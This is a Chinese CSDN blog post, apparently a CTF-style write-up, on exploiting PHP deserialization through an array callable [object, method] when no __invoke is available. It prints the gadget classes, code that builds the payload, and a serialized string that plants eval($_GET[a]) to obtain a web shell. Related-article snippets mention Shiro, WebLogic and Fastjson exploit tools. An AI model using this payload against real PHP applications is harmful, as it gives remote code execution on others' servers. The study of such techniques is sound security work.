php反序列化漏洞中当不存在__invoke时的一种利用思路

最新推荐文章于 2023-04-12 16:59:54 发布
最新推荐文章于 2023-04-12 16:59:54 发布
阅读量2.3k 收藏
点赞数
文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51341898/article/details/122496889
版权

存在这样两个类,找不到可以利用的__invoke时,如何获得shell

class a{
    public $code;
    public function __destruct()
    {
        $test=$this->code;
        $test();
    }
}

class b{
    public $code;
    public function getshell(){
        eval($this->code);
    }
}

php中可以动态调用函数

$a="phpinfo";
$a();

通过这种方式可以调用phpinfo函数,如何通过这种方式调用类中的函数,经过测试,数组方式可以调用类中函数

class test
{
   public function aa()
   {
       echo "123";
   }
}
$ar=array(new test(),"aa");
$ar();

调用成功,执行了aa函数

接下来利用方式就简单了,通过常规反序列化利用方式利用即可

class a{
    public $code;
    public function __destruct()
    {
        $test=$this->code;
        $test();
    }
}

class b{
    public $code;
    public function getInfo(){
        eval($this->code);
    }
}

$q=new a();
$w=new b();
$w->code="eval(\$_GET[a]);";
$q->code=array($w,"getInfo");
echo serialize($q);

获得序列化结果

O:1:"a":1:{s:4:"code";a:2:{i:0;O:1:"b":1:{s:4:"code";s:15:"eval($_GET[a]);";}i:1;s:7:"getInfo";}}

反序列化成功获得shell

 

kd_dzh
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP-反序列漏洞 例题详解
weixin_57041250的博客
11-03 272
PHP反序列化漏洞利用条件:1.代码中要unserialize()2.在参数传递给unserialize()的过程是可控的。
序列化,反序列化技术,__sleep __wakeup __tostring __invoke()
qq_37171379的博客
02-12 1137
含义: 序列化: 就是将一个变量所代表的“内存”数据,转换为“字符串”形式并持久保存在硬盘上的一种做法。 反序列化: 就是将序列化之后保存在硬盘上的“字符串数据”,恢复为其原来的内存形式的变量数据的一种做法。 序列化的做法: $v1 = 123; //这是一个变量,代表任意的内存数据 $s1 = serialize( $v1 ); //将任何类型的变量数据,转换为“字符串” file_put...
PHP#魔术方法全解
马丁路德彬
02-27 370
简介__construct(), __destruct(), __call(), __callStatic(), __get(), __set(), __isset(), __unset(), __sleep(), __wakeup(), __toString(), __invoke(), __set_state(), __clone() 和 __debugInfo() 等方法在 PHP 中被称为”
PHP 反序列化
qq_27862405的博客
05-05 179
PHP 反序列化
PHP反序列化漏洞
qwzf
08-14 960
前言 最近又学习了新的漏洞知识——PHP反序列化漏洞,学习之余总结一下。 什么是php反序列化漏洞 php反序列化漏洞,又叫php对象注入漏洞。 简单来讲,就是在php反序列化候,反序列化的内容是用户可控,那么恶意用户就可以构造特定序列化内容的代码,通过unserialize()函数进行特定的反序列化操作,并且程序的某处存在一些敏感操作是写在类中的,那么就可以通过这段恶意代码,达到执行攻击者想...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修复验证等
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
Java反序列化漏洞利用工具.zip
04-10
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以
java反序列化漏洞利用工具WebLogicExploit_weblogic图形化漏洞利用工具
09-01
jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出...
深入浅析PHP的session反序列化漏洞问题
10-19
主要介绍了PHP的session反序列化漏洞问题,需要的朋友可以参考下
PHP反序列化
qq_63267612的博客
02-28 1242
php序列化的过程就是把数据转化成一种可逆的数据结构,逆向的过程就叫做反序列化php将数据序列化和反序列化会用到两个函数:serialize 将对象格式化成有序的字符串。unserialize 经字符串还原成原来的对象。序列化的目的是方便数据的传输和储存。a:3:{i:0;s:4:"anan";i:1;s:3:"shi";i:2;s:2:"zi";a:array代表是数组,后面的3说明有三个属性i:代表是整型数据int,后面的0是数组下标。
invoke方法_PHP魔术方法
weixin_39851977的博客
11-27 173
做下记录,温故而知新。构造函数和析构函数__construct 构造函数类会在每次创建新对象先调用此方法,所以非常适合在使用对象之前做一些初始化工作。__deconstruct析构函数会在到某个对象的所有引用都被删除或者当对象被显式销毁执行。<?php class MyDestructableClass { public $name; function __construc...
PHP反序列化由浅入深,php反序列化总结(一)
weixin_30869777的博客
03-16 953
一、魔术方法1、列举__wakeup() //使用unserialize触发__sleep()//使用serialize触发__destruct() //对象被销毁触发__call() //在对象上下文中调用不可访问的方法触发__callStatic()//在静态上下文中调用不可访问的方法触发__get() //用于从不可访问的属性读取数据__set() //用于将数据写入不可访问的属性...
PHP反序列化&魔术方法详细解析及实例&公私有属性对比
ran的博客
04-12 1901
2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。1.实验代码部分如下。1.实验代码部分如下。1.实验代码部分如下。1.实验代码部分如下。1.实验代码部分如下。
[Web/基础/反序列化]反序列化轻量总结
車鈊的博客
10-12 384
文章目录反序列化序列化和反序列化序列化是什么?魔术方法三种类型的变量的表示方法(public,protected,private)基本反序列化破坏__Wakeup失效反序列化写链其他形式反序列化SESSION反序列化Session原理其反序列化字符逃逸Python反序列化`Phar`反序列化什么是`Phar`文件?`Phar`结构那么思路是什么呢?一些限制框架反序列化 反序列化 序列化和反序列化 序列化是什么? 我们在运行程序变量是存在于内存当中的,为了保存他们,我们可以将其转化为有确定格式的、可传输、可
php反序列化总结(一)
qq_43801002的博客
05-16 1053
一、魔术方法 1、列举 __wakeup() //使用unserialize触发 __sleep()//使用serialize触发 __destruct() //对象被销毁触发 __call() //在对象上下文中调用不可访问的方法触发 __callStatic()//在静态上下文中调用不可访问的方法触发 __get() //用于从不可访问的属性读取数据 __set() //用于将数据写入不可访问的属性 __isset()//在不可访问的属性上调用isset()或empty()触发 __unset
一文了解反序列化漏洞
qq_41648889的博客
07-13 709
php反序列化
(渗透学习)PHP 反序列化漏洞---魔术方法使用不当引发的后果
yang1234567898的博客
12-26 680
序列化:serialize() 反序列化:unserialize() 序列化对象: <?php class whatDo { var $x = "imz"; var $y = 10; } $obj = new whatDo(); echo serialize($obj); ?> 输出:O:6:"whatDo":2:{s:1:"x";s:3:"imz";s:1:"y";i:10;} 反序列化漏洞成因: 在PHP中,当对象在被使用,会自动触发魔术方法,如: ..
Web安全--反序列化漏洞(java篇)
bobo_milk的博客
11-29 3053
java反序列化参考
fastjson反序列化漏洞_Fastjson反序列化漏洞的检测和利用
最新发布
05-21
1. 利用Fastjson反序列化漏洞执行远程命令:黑客可以构造一个恶意JSON字符串,通过Fastjson反序列化漏洞实现远程命令执行。 2. 利用Fastjson反序列化漏洞实现文件读取:黑客可以构造一个恶意JSON字符串,通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值